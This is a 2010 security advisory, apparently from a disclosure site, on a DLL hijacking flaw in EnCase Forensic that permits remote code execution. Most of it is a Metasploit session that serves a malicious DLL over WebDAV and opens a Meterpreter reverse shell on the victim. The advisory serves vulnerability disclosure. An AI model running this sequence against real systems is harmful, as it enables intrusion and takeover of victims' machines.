Advisory: EnCase - Insecure Library Loading Allows Remote Code Execution (DLL Hijacking) [Update: 02.09.2010]
- in a nutshell:
---------------------------------------------
EnCase - Insecure Library Loading Allows Remote Code Execution (DLL Hijacking)
Date: 29.08.2010
---------------------------------------------
- EnCase Description
From the simplest requirements to the most complex, EnCase Forensic is the premier computer forensic application on the market.
- Insecure Library Loading allows Remote Code Execution
This vulnerability was discovered using the Metasploit Framework with the following option: "set EXTENSIONS endump"
For more vulnerability details please check the links in the reference section.
- Affected Versions
v6.15.0.82/6.16.2/6.17.0.90 - other releases may also be affected.
- Solution
It is not known if there are fixed releases available.
- Credits
The vulnerability was discovered by m1k3 - m1k3#at#m1k3#dot#at
- Timeline
29.08.2010 - vulnerability discovered
29.08.2010 - public disclosure
- Reference
- http://www.guidancesoftware.com/forensic.htm
- http://www.microsoft.com/technet/security/advisory/2269637.mspx
- http://www.exploit-db.com/dll-hijacking-vulnerable-applications/
- http://blog.metasploit.com/2010/08/better-faster-stronger.html
- http://www.metasploit.com/modules/exploit/windows/browser/webdav_dll_hij...
- http://www.securityfocus.com/bid/42852
- http://www.s3cur1ty.de/advisories
- Exploiting example:
msf exploit(webdav_dll_hijacker) > set EXTENSIONS endump
EXTENSIONS => endump
msf exploit(webdav_dll_hijacker) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
BASENAME policy yes The base name for the listed files.
EXTENSIONS endump yes The list of extensions to generate
SHARENAME documents yes The name of the top-level share.
SRVHOST 10.8.28.9 yes The local host to listen on.
SRVPORT 80 yes The daemon port to listen on (do not change)
URIPATH / yes The URI to use (do not change).
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process
LHOST 10.8.28.9 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(webdav_dll_hijacker) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 10.8.28.9:4444
[*]
[*] Exploit links are now available at \\10.8.28.9\documents\
[*]
[*] Using URL: http://10.8.28.9:80/
[*] Server started.
msf exploit(webdav_dll_hijacker) >
[*] 10.8.28.55:49310 PROPFIND /documents
[*] 10.8.28.55:49310 PROPFIND => 301 (/documents)
[*] 10.8.28.55:49310 PROPFIND /documents/
[*] 10.8.28.55:49310 PROPFIND => 207 Directory (/documents/)
[*] 10.8.28.55:49310 PROPFIND /documents
[*] 10.8.28.55:49310 PROPFIND => 301 (/documents)
[*] 10.8.28.55:49310 PROPFIND /documents/
[*] 10.8.28.55:49310 PROPFIND => 207 Directory (/documents/)
[*] 10.8.28.55:49310 PROPFIND => 207 Top-Level Directory
[*] 10.8.28.55:49310 PROPFIND /DOCUMENTS
[*] 10.8.28.55:49310 PROPFIND => 301 (/DOCUMENTS)
[*] 10.8.28.55:49310 PROPFIND /DOCUMENTS/
[*] 10.8.28.55:49310 PROPFIND => 207 Directory (/DOCUMENTS/)
[*] 10.8.28.55:49310 PROPFIND => 207 Top-Level Directory
[*] 10.8.28.55:49310 PROPFIND /documents/rsaenh.dll
[*] 10.8.28.55:49310 PROPFIND => 207 File (/documents/rsaenh.dll)
[*] 10.8.28.55:49310 PROPFIND /DOCUMENTS
[*] 10.8.28.55:49310 PROPFIND => 301 (/DOCUMENTS)
[*] 10.8.28.55:49310 PROPFIND /DOCUMENTS/
[*] 10.8.28.55:49310 PROPFIND => 207 Directory (/DOCUMENTS/)
[*] 10.8.28.55:49310 PROPFIND => 207 Top-Level Directory
[*] 10.8.28.55:49310 GET => DLL Payload
[*] 10.8.28.55:49310 PROPFIND /documents/SDDisk.dll
[*] 10.8.28.55:49310 PROPFIND => 207 File (/documents/SDDisk.dll)
[*] 10.8.28.55:49310 GET => DLL Payload
[*] 10.8.28.55:49310 PROPFIND /
[*] 10.8.28.55:49310 PROPFIND => 207 Directory (/)
[*] 10.8.28.55:49310 PROPFIND => 207 Top-Level Directory
[*] 10.8.28.55:49310 PROPFIND /documents/rundll32.exe
[*] 10.8.28.55:49310 PROPFIND => 404 (/documents/rundll32.exe)
[*] 10.8.28.55:49310 PROPFIND /DOCUMENTS
[*] 10.8.28.55:49310 PROPFIND => 301 (/DOCUMENTS)
[*] 10.8.28.55:49310 PROPFIND /DOCUMENTS/
[*] 10.8.28.55:49310 PROPFIND => 207 Directory (/DOCUMENTS/)
[*] 10.8.28.55:49310 PROPFIND => 207 Top-Level Directory
[*] Sending stage (748544 bytes) to 10.8.28.55
[*] Meterpreter session 14 opened (10.8.28.9:4444 -> 10.8.28.55:49315) at Sun Aug 29 20:01:53 +0200 2010
msf exploit(webdav_dll_hijacker) > sessions -i 14
[*] Starting interaction with 14...
meterpreter > getuid
Server username: m1k3-Vista\m1k3
Recent comments
3 weeks 3 days ago
3 weeks 5 days ago
4 weeks 3 days ago
4 weeks 3 days ago
9 weeks 6 days ago
10 weeks 2 days ago
10 weeks 3 days ago
11 weeks 2 days ago
11 weeks 2 days ago
11 weeks 3 days ago